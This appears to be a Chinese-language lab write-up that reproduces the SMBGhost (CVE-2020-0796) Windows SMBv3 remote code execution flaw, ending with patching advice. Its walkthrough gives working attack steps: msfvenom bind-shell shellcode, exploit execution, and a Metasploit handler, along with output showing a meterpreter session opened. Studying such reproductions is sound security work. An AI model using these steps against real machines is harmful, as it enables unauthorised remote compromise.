CVE-2020-0796 'SMBGhost' Remote Code Execution
CVE-2020-0796 ‘SMBGhost’ Remote Code Execution
漏洞描述:
在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
漏洞原理:
https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/ https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html https://mp.weixin.qq.com/s/vM4jPmklOmFTVo3xI-0JFg
影响版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
补丁检测:
systeminfo | findstr KB4551762smb服务确认:(只影响 SMB v3.1.1,1903和1909)因为 SMBv2 和 SMBv3 共用一个堆叠,所以在 Windows 8 或 Windows Server 2012 中启用或禁用 SMBv2 时,也会启用或禁用 SMBv3
PS C:\Windows\system32> Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol
EnableSMB1Protocol EnableSMB2Protocol
------------------ ------------------
True True漏洞检测poc:
漏洞利用exp:
RCE: https://www.exploit-db.com/exploits/48537 LPE: https://github.com/ZecOps/CVE-2020-0796-LPE-POC
漏洞复现:
- 环境搭建: 靶机:Windows 10 Version 1909 for x64-based Systems() windows 10 version 1903 x64 (192.168.145.146) 攻击:kali2020 (192.168.145.136) exp: https://www.exploit-db.com/exploits/48537 (完整exp: https://github.com/you0708/lznt1 ) https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip
- 环境准备:
- 开启smb3.0 运行>control,选择程序及功能 打开windows功能SMB 1.0/CIFS 文件共享支持,重启,
- 查看SMB2.0(3.0共用服务)是否开启
ps>Get-SmbServerConfiguration | Select - 关闭防火墙
- 测试记录:
- 调整exp的攻击内容,通过msf生成shellcode在受害者主机开启个5555为端口的(spoolsv.exe)监听连接进程
msfvenom -p windows/x64/meterpreter/bind_tcp lport=5555 -f py -o Desktop/shellcode.txt- 注: 这里将shellcode复制替换进exp的user_payload中,且应注意字符长度不应超过600字符
- 准备就绪执行exp
python3 exploit.py -ip 192.168.145.146 # 配置存在问题的ip并执行
执行成功
kali@kali:~/Desktop/SMBGhost_RCE_PoC-master$ python3 exploit.py -ip 192.168.145.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7b0c0000000
[+] found PML4 self-ref entry 152
[+] found HalpInterruptController at fffff7b0c0001478
[+] found HalpApicRequestInterrupt at fffff8026e55ebb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffa97bc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...此时在被攻击机内存中出现一条进程spoolsv.exe,监听端口为5555,下面使用msf连接。
- 配置连接受害者机器及端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置连接模式,直连
msf5 exploit(multi/handler) > set rhost 192.168.145.146 #设置目标靶机IP地址
msf5 exploit(multi/handler) > set lport 5555 #设置靶机监听的端口
msf5 exploit(multi/handler) > exploit -j -t
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started bind TCP handler against 192.168.145.146:5555
[*] Sending stage (201283 bytes) to 192.168.145.146
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.145.146:5555) at 2020-06-11 02:57:49 -0400session上线。
一个意外发现 python2执行命令,脚本执行异常可导致蓝屏现象
载入执行exp
python exploit.py -ip 192.168.145.146
https://mp.weixin.qq.com/s/vM4jPmklOmFTVo3xI-0JFg
修复建议: CVE-2020-0796是内存破坏漏洞,精心利用可导致远程代码执行,同时网络上已经出现该漏洞的本地提权利用代码。在此,建议受影响版本Windows用户及时根据微软官方漏洞防护公告对该漏洞进行防护。